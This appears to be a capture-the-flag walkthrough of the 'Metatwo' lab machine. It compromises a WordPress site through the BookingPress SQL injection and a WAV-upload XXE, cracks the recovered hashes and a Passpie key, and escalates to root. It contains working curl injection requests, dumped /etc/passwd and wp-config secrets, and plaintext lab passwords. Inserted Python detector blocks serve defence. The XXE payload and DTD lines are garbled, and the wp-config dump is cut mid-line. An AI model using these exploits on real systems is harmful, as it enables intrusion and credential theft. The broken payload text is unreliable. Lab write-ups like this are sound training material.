Metatwo

  • performed an initial nmap scan with the default scripts `nmap -sV -sC` and found 3 open ports (21, 22, 80); port 80 is an nginx web server that redirects to http://metapress.htb

  • added metapress.htb to /etc/hosts file

  • performed a full TCP port scan `nmap -sV -p-` in case there were other non-default open ports; there were none

  • performed an nmap scan on port 80 with the http-enum script to enumerate common web directories `nmap -sV --script=http-enum`, which shows us the following:

    80/tcp open http nginx 1.18.0
    |_http-trane-info: Problem with XML parsing of /evox/about
    |_http-server-header: nginx/1.18.0
    | http-enum:
    |   /wp-login.php: Possible admin folder
    |   /wp-json: Possible admin folder
    |   /robots.txt: Robots file
    |   /.htaccess: Incorrect permissions on .htaccess or .htpasswd files
    |   /readme.html: Wordpress version: 2
    |   /: WordPress version: 5.6.2
    |   /feed/: Wordpress version: 5.6.2
    |   /wp-includes/images/rss.png: Wordpress version 2.2 found.
    |   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
    |   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
    |   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
    |   /wp-login.php: Wordpress login page.
    |   /wp-admin/upgrade.php: Wordpress login page.
    |   /readme.html: Interesting, a readme.
    |_  /0/: Potentially interesting folder

  • banner grabbing with netcat on port 21 `nc -nv 21` shows us the following

    220 ProFTPD Server (Debian)

  • banner grabbing with netcat on port 22 `nc -nv 22` shows us the following

    SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1

  • using `whatweb` we confirm that the HTTP server is nginx 1.18 and we get information about the website http://metapress.htb:

    http://metapress.htb/ [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.18.0],
    IP[10.129.182.75], MetaGenerator[WordPress 5.6.2], PHP[8.0.24], PoweredBy[–], Script,
    Title[MetaPress – Official company site], UncommonHeaders[link], WordPress[5.6.2],
    X-Powered-By[PHP/8.0.24], nginx[1.18.0]

  • from the `whatweb` output we see that the website is running WordPress 5.6.2 and PHP 8.0.24

  • browsing the website we find the `/events` page, and its source code shows it uses a plugin called BookingPress, version 1.0.10

  • searching Google for `BookingPress 1.0.10` vulnerabilities we find that it is vulnerable to an unauthenticated SQL injection (ref: CVE-2022-0739)

  • following the published exploitation steps, we take the nonce `65ad7bec42` from the page's source code and invoke a curl command to exploit it

    curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=65ad7bec42&category_id=33&total_service=-7502)
    UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

  • seeing that it works, we change the query to the following to get the username and password hash of the admin account:

    curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=65ad7bec42&category_id=33&total_service=-7502)
    UNION ALL SELECT user_login,user_email,user_pass,NULL,NULL,NULL,NULL,NULL,NULL from wp_users limit 1 offset 0-- -'

  • changing the limit/offset to the second row we also get the manager's account

  • and we get credentials from the results

    {"bookingpress_service_id":"admin","bookingpress_category_id":"admin@metapress.htb","bookingpress_service_name":"$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV."
    username: admin
    password: $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.

    username: manager
    password: $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
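The injection above rides on a form parameter that BookingPress should only ever receive as an integer, so a request-body check catches it before any query is built. The following is an added example, not BookingPress's own code or its fix: a Python inspector that flags `admin-ajax.php` POST bodies for this action whose `category_id` or `total_service` is not a plain integer; the sample bodies are constructed here.

```python
import re
from urllib.parse import parse_qs

# AJAX action from the page; the vulnerable parameter is total_service.
BOOKINGPRESS_ACTION = "bookingpress_front_get_category_services"
# Both ids must be plain (optionally negative) integers.
INT_RE = re.compile(r"^-?\d+$")
# Tokens that never belong in a numeric id (case-insensitive).
SQL_TOKENS = re.compile(r"(union|select|@@|--|/\*|\bor\b|\band\b)", re.I)


def inspect_bookingpress_body(body: str) -> dict:
    """Classify one application/x-www-form-urlencoded POST body sent to admin-ajax.php.

    Returns {"relevant": bool, "suspicious": bool, "reasons": [str, ...]}.
    Only requests for the BookingPress action are considered relevant.
    """
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("action") != BOOKINGPRESS_ACTION:
        return {"relevant": False, "suspicious": False, "reasons": []}
    reasons = []
    for name in ("category_id", "total_service"):
        value = params.get(name, "")
        if not INT_RE.match(value):
            reasons.append(f"{name} is not a plain integer: {value[:40]!r}")
        if SQL_TOKENS.search(value):
            reasons.append(f"{name} contains SQL tokens")
    return {"relevant": True, "suspicious": bool(reasons), "reasons": reasons}


def scan_bodies(bodies) -> list:
    """Return the indices of bodies that look like CVE-2022-0739 attempts."""
    return [i for i, b in enumerate(bodies) if inspect_bookingpress_body(b)["suspicious"]]


# Constructed sample bodies: a normal booking request, the UNION probe shape
# shown on this page, and an unrelated WordPress AJAX call.
SAMPLE_BODIES = [
    "action=bookingpress_front_get_category_services&_wpnonce=65ad7bec42"
    "&category_id=33&total_service=5",
    "action=bookingpress_front_get_category_services&_wpnonce=65ad7bec42"
    "&category_id=33&total_service=-7502) UNION ALL SELECT @@version,"
    "@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -",
    "action=heartbeat&_nonce=65ad7bec42&data%5Bwp-auth-check%5D=true",
]

if __name__ == "__main__":
    for i in scan_bodies(SAMPLE_BODIES):
        print(i, inspect_bookingpress_body(SAMPLE_BODIES[i])["reasons"])
```

Note that `_wpnonce` only protects against CSRF; it does nothing to authenticate the caller, which is why the request works unauthenticated and why the integer check has to live server-side.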

  • seeing that the passwords are hashed, we use `john` to crack them: `john hashedpasswords`

  • we were only able to crack the manager's password, which was `partylikearockstar`

  • after logging in as manager we find the Media Library upload; searching for information about it on Google we see it's vulnerable to XXE (ref: CVE-2021-29447), which allows us to upload our payload as a WAVE file

  • we start by creating our payload `payload.wav`

    echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00

    %remote;%init;%trick;]>\x00' > payload.wav

  • next we create `evil.dtd`, which holds the malicious external entity definitions our payload references

    “ >

  • now we start a web server in the directory where `evil.dtd` sits, `python -m http.server`, which listens on port 8000

  • uploading our payload returns a base64-encoded string; decoding it gives us `/etc/passwd`:

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
    sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
    jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
    systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
    systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
    mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false
    proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin
    ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin

  • we can see two users with a login shell: `root` and `jnelson`

  • now we update our payload to fetch `../wp-config.php`

    “ >

    +3m?.B/:' );
    define( 'SECURE_AUTH_KEY', 'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
    define( 'LOGGED_IN_KEY', 'J+mxCaP4zdd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
    define( 'NONCE_KEY', 'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
    define( 'AUTH_SALT', '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );
    define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
    define( 'LOGGED_IN_SALT', '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
    define( 'NONCE_SALT', '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );
    /** WordPress Database Table prefix. */
    $table_prefix = 'wp_';
    /** For developers: WordPress debugging mode. @link https://wordpress.org/support/article/debugging-in-wordpress/ */
    define( 'WP_DEBUG', false );
    /** Absolute path to the WordPress directory. */
    if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); }
    /** Sets up WordPress vars and included files. */
    require_once ABSPATH . 'wp-settings.php';

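The upload side can be checked before getID3 ever parses the file: a RIFF WAVE is a sequence of `fourcc + little-endian size + payload` chunks, and the payload above abuses the `iXML` chunk to smuggle a DTD into the XML parser. The following is an added example (not WordPress's or getID3's code): a Python walker over the chunk list that reports any `iXML` chunk carrying a DOCTYPE or ENTITY declaration; both sample files are constructed inside the block.

```python
import struct

# Declarations a legitimate iXML chunk never needs; SYSTEM/PUBLIC mark external refs.
DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM", b"PUBLIC")


def build_wav(chunks) -> bytes:
    """Assemble a RIFF/WAVE byte string from (fourcc, payload) pairs (test helper)."""
    body = b"".join(
        fourcc + struct.pack("<I", len(data)) + data + (b"\x00" if len(data) % 2 else b"")
        for fourcc, data in chunks
    )
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body


def iter_riff_chunks(blob: bytes):
    """Yield (fourcc, payload) for each chunk; a truncated last chunk is returned short."""
    if len(blob) < 12 or blob[:4] != b"RIFF" or blob[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(blob):
        fourcc = blob[pos:pos + 4]
        size = struct.unpack("<I", blob[pos + 4:pos + 8])[0]
        yield fourcc, blob[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # chunk payloads are word-aligned


def find_xxe_in_wav(blob: bytes) -> list:
    """Return one finding per iXML chunk that carries a DTD or entity declaration."""
    findings = []
    for fourcc, data in iter_riff_chunks(blob):
        if fourcc != b"iXML":
            continue
        if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
            hits = [m.decode() for m in DTD_MARKERS if m in data]
            findings.append({"chunk": "iXML", "markers": hits, "size": len(data)})
    return findings


FMT = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)  # PCM, mono, 8 kHz, 16-bit
# Constructed samples: ordinary metadata, and an inline DTD pulling a remote .dtd.
BENIGN_WAV = build_wav([
    (b"fmt ", FMT),
    (b"iXML", b"<?xml version='1.0'?><BWFXML><PROJECT>demo</PROJECT></BWFXML>"),
    (b"data", b"\x00" * 16),
])
DTD_WAV = build_wav([
    (b"fmt ", FMT),
    (b"iXML", b"<?xml version='1.0'?><!DOCTYPE x [<!ENTITY % r SYSTEM "
              b"'http://dtd.invalid/x.dtd'>%r;]><x/>"),
])
```

The same walk also exposes the trick in the page's payload: its `RIFF` size field and `iXML` size field need not match the real data length, so a checker must bound every read by the actual buffer, as `iter_riff_chunks` does.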
  • connecting to FTP with the credentials we found, we find a folder called `mailer` containing a file `send_email.php`, which holds the credentials of the user `jnelson`

    $mail->Host = "mail.metapress.htb";
    $mail->SMTPAuth = true;
    $mail->Username = "jnelson@metapress.htb";
    $mail->Password = "Cb4_JmWM8zUZWMu@Ys";
    $mail->SMTPSecure = "tls";
    $mail->Port = 587;

  • using these credentials for `jnelson` we can now SSH in as that user and read the user.txt flag: ed4bbbe6ca2e3b43babc791679126769

  • our next step is escalating our privileges to root

  • moving to the `/tmp` directory we upload LinEnum.sh, which scans the system for common misconfigurations, and execute it; it didn't find anything useful we could use

  • listing our user's home directory with `ls -lah` we see a `.passpie` folder, which means the user is using the Passpie password manager

  • typing `passpie list` we get the list of stored entries, but their passwords are hidden

    ╒════════╤═════════╤════════════╤═══════════╕
    │ Name │ Login │ Password │ Comment │
    ╞════════╪═════════╪════════════╪═══════════╡
    │ ssh │ jnelson │ ******** │ │
    ├────────┼─────────┼────────────┼───────────┤
    │ ssh │ root │ ******** │ │
    ╘════════╧═════════╧════════════╧═══════════╛

  • listing the `.passpie` folder with `ls -lah` we find a `.keys` file, which contains a PGP public and private key

  • copying the private key to our machine, we convert it with `gpg2john private.key > crackme` and then crack the passphrase with john: `john crackme --wordlist=/usr/share/wordlists/rockyou.txt`

  • after john finishes cracking we get the passphrase, which is `blink182`

  • going back to the victim's machine we can now export the passwords in plain text using the Passpie master passphrase we just cracked: `passpie export users`

  • and now if we `cat users` we get:

    credentials:
    - comment: ''
      fullname: root@ssh
      login: root
      modified: 2022-06-26 08:58:15.621572
      name: ssh
      password: !!python/unicode 'p7qfAZt4_A1xo_0x'
    - comment: ''
      fullname: jnelson@ssh
      login: jnelson
      modified: 2022-06-26 08:58:15.514422
      name: ssh
      password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
    handler: passpie
    version: 1.0

  • now we have root's password, which we can use to get the root flag